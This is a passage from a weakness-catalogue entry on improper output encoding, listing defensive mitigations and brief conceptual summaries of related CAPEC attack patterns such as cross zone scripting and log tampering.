Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
  • Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability.
Mitigation MIT-27
Architecture and Design

Strategy: Parameterization

  • If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
  • For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection.
Mitigation
Architecture and Design Implementation

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

Mitigation
Architecture and Design

In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input.

Mitigation
Architecture and Design

Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20).

Mitigation
Requirements

Fully specify which encodings are required by components that will be communicating with each other.

Mitigation
Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

CAPEC-104: Cross Zone Scripting

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-81: Web Server Logs Tampering

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.